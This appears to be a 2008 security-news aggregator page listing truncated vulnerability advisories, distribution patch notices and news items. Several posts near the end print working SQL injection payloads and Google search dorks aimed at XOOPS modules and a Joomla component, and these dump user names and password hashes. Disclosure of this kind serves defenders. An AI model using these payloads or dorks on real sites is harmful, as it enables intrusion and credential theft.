Heap overflow in Sybase MobiLink 10.0.1.3629

 ( 639 days 11 hours ago)

Luigi Auriemma Application: Sybase MobiLink Versions: <= 10.0.1.3629 Platforms: Windows and Linux/Unix Bug: heap overflow Exploitation: remote Date: 20 Feb 2008 Author: Luigi Auriemma e-mail: aluigiatautistici.org web: aluigi.org 1) Introduction 2) Bug 3) The Code 4) Fix 1) Introduction ...

iDefense Security Advisory 02.19.08: EMC RepliStor Multiple Heap Overflow Vulnerabilities

 ( 639 days 11 hours ago)

iDefense Security Advisory 02.19.08 Feb 19, 2008 I. BACKGROUND EMC RepliStor is a data backup and recovery application for Windows. For more information, visit the vendor's website at the following URL. II. DESCRIPTION Remote exploitation of multiple heap overflow vulnerabilities in EMC ...

Advisory SE-2008-01: PunBB Blind Password Recovery Vulnerability

 ( 639 days 11 hours ago)

SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: PunBB Blind Password Recovery Vulnerability Release Date: 2008/02/20 Last Modified: 2008/02/20 Author: Stefan Esser [stefan.esser[at]sektioneins.de] Application: PunBB <= 1.2.16 Severity: Weak random numbers lead to a blind password recovery ...

Poor IT security blamed for Societe Generale fraud

 ( 639 days 12 hours ago)

French bank Societe Generale could have prevented fraud that cost it $7.2B by imposing tighter controls on traders, a report concludes.

Re: XOOPS Module wflinks SQL Injection(cid)

 ( 639 days 17 hours ago)

fyi - duplicate of On Mon, Feb 18, 2008 at 05:19:20PM -0000, hackturkiye.hackturkiyeatgmail.com wrote: > > # > # XOOPS Module wflinks SQL Injection(cid) > # > > # > # AUTHOR : SatBUN > # > # com > # > > # ...

Xoops-2.0.16 Remote File Inclusion

 ( 639 days 17 hours ago)

In the Script Xoops-2.0.16 are Remote File Inclusion Bugs Script : xoops-2.0.16-Kararli Discovered By : F10 Contact : byf10athotmail.com WebSite : Greetz : byemR3 , H0tturk , TaRanTuLa , gsy , ercu145 , LupuS,m0sted,CyberGhost ... . >From : Turkey Description : In the Script Xoops-2.0.16 are ...

Web Hacking Incidents Database Update for Feb 20th

 ( 639 days 17 hours ago)

The latest bunch of events added to the Web Hacking Incidents Database include many international incidents. Enjoy. And if you still haven't had a chance to read our 2007 annual report, it is quite fascinating. you can find it at . ...

[security bulletin] HPSBTU02311 SSRT080001 rev.1 - HP Tru64 UNIX running Perl, Remote Execution of Arbitrary Code

 ( 639 days 17 hours ago)

SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01362465 Version: 1 HPSBTU02311 SSRT080001 rev.1 - HP Tru64 UNIX running Perl, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-02-19 Last Updated: 2008-02-19 ...

Debian: New pcre3 packages fix arbitrary code execution

 ( 639 days 17 hours ago)

LinuxSecurity.com: It was discovered that specially crafted regular expressions involving codepoints greater than 255 could cause a buffer overflow in the PCRE library (CVE-2008-0674).

Mandriva: Updated Thunderbird packages fix multiple

 ( 639 days 17 hours ago)

LinuxSecurity.com: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 2.0.0.9. This update provides the latest Thunderbird to correct these issues.

Debian: New libimager-perl packages fix arbitrary code execution

 ( 639 days 17 hours ago)

LinuxSecurity.com: It was discovered that libimager-perl, a Perl extension for Generating 24 bit images, did not correctly handle 8-bit per-pixel compressed images, which could allow the execution of arbitrary code.

Russian hosting network running a protection racket, researcher says

 ( 640 days 4 hours ago)

The notorious Russian Business Network is running a protection racket that extorts up to $2,000 a month for "protective Web services" from borderline sites, a researcher alleged today.

[SECURITY] [DSA 1499-1] New pcre3 packages fix arbitrary code execution

 ( 640 days 5 hours ago)

- Debian Security Advisory DSA-1499-1 securityatdebian.org Florian Weimer February 19, 2008 - Package : pcre3 Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-0674 It was discovered that specially crafted regular expressions involving ...

Access violation and limited informations disclosure in webcamXP 3.72.440.0

 ( 640 days 5 hours ago)

Luigi Auriemma Application: webcamXP Versions: <= 3.72.440.0 <= beta 4.05.280 Platforms: Windows Bug: access violation with limited informations disclosure Exploitation: remote Date: 18 Feb 2008 Author: Luigi Auriemma e-mail: aluigiatautistici.org web: aluigi.org 1) Introduction 2) Bug 3) The Code 4) Fix 1) Introduction ...

Two heap overflow in Foxit WAC Server 2.0 Build 3503

 ( 640 days 5 hours ago)

Luigi Auriemma Application: Foxit Remote Access Server (WAC Server) Versions: <= 2.0 Build 3503 Platforms: Windows Bugs: A] telnet option heap overflow B] SSH packet heap overflow Exploitation: remote Date: 16 Feb 2008 Author: Luigi Auriemma e-mail: aluigiatautistici.org web: aluigi.org 1) Introduction 2) Bugs ...

Multiple buffer-overflow in NowSMS v2007.06.27

 ( 640 days 5 hours ago)

Luigi Auriemma Application: Now SMS/MMS Gateway Versions: <= v2007.06.27 Platforms: Windows Bugs: A] web authorization buffer-overflow B] SMPP buffer-overflow Exploitation: remote Date: 19 Feb 2008 Author: Luigi Auriemma e-mail: aluigiatautistici.org web: aluigi.org 1) Introduction 2) Bugs 3) The Code 4) Fix 1) Introduction ...

NULL pointer crash in freeSSHd 1.20

 ( 640 days 5 hours ago)

Luigi Auriemma Application: freeSSHd Note: is possible that the problem affects also wodSSHServer anyway this has not been tested Versions: <= 1.2.0 Platforms: Windows Bug: NULL pointer crash Exploitation: remote Date: 17 Feb 2008 Author: Luigi Auriemma e-mail: aluigiatautistici.org web: aluigi.org 1) Introduction ...

[ MDVSA-2007:047 ] - Updated Thunderbird packages fix multiple vulnerabilities

 ( 640 days 5 hours ago)

Mandriva Linux Security Advisory MDVSA-2007:047 Package : mozilla-thunderbird Date : February 19, 2008 Affected: 2007.1, 2008.0 Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 2.0.0.9. ...

PHP-Nuke Module Web_Links SQL Injection(cid)

 ( 640 days 5 hours ago)

# # PHP-Nuke Module WebLinks SQL Injection(cid) # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: file-index modules-php-op-modload-name-WebLinks "lop viewlink" # DORK 2 : allinurl: cid file-index modules-php-op-modload"lop viewlink"name-WebLinks example : = (exploit) ...

XOOPS Module wflinks SQL Injection(cid)

 ( 640 days 5 hours ago)

# # XOOPS Module wflinks SQL Injection(cid) # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: modules/wflinks/viewcat.php # # DORK 2 : allinurl: modules/wflinks # example = [exploit] EXPLOIT : ...

XOOPS Module eEmpregos SQL Injection(cid)

 ( 640 days 5 hours ago)

# # XOOPS Module eEmpregos SQL Injection(cid) # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: "modules/eEmpregos/index.php" # # DORK 2 : allinurl: cid "modules/eEmpregos" # example =[exploit] EXPLOIT : ...

XOOPS Module classifieds SQL Injection(cid)

 ( 640 days 5 hours ago)

# # XOOPS Module classifieds SQL Injection(cid) # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: cid"modules/classifieds/index.php?pa=Adsview" # example =[exploit] EXPLOIT : -00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/fromxoopsusers/*where admin -1 # SatBUN i AM NOT HACKER SatBUN

Re: CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference

 ( 640 days 5 hours ago)

A basic malware to exploit this vulnerability:

[SECURITY] [DSA 1498-1] New libimager-perl packages fix arbitrary code execution

 ( 640 days 5 hours ago)

- Debian Security Advisory DSA-1498-1 securityatdebian.org Steve Kemp February 19, 2008 - Package : libimager-perl Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-2459 Debian Bug : 421582 It was discovered that libimager-perl, a Perl extension for Generating 24 ...

joomla SQL Injection(com_magazine)

 ( 640 days 5 hours ago)

# # joomla SQL Injection(commagazine) # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl :"commagazine"pageid= # # DORK 2 : allinurl: # EXPLOIT : index.php?option=commagazine&task=guide&id=21&page=7&pageid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/josusers/** # SatBUN i AM NOT HACKER SatBUN

XOOPS Module seminars SQL Injection

 ( 640 days 5 hours ago)

# # XOOPS Module seminars SQL Injection # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl :"modules/seminars/index.php?op=show" # # DORK 2 : allinurl: # EXPLOIT : modules/seminars/index.php?op=show&id=-77777/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoopsusers/*where admin ...

XOOPS Module badliege SQL Injection

 ( 640 days 5 hours ago)

# # XOOPS Module badliege SQL Injection # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl :"modules/badliege/index.php?op=show" # # DORK 2 : allinurl: # EXPLOIT : modules/badliege/index.php?op=show&id=-9999999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/fromxoopsusers/*where admin -5 ...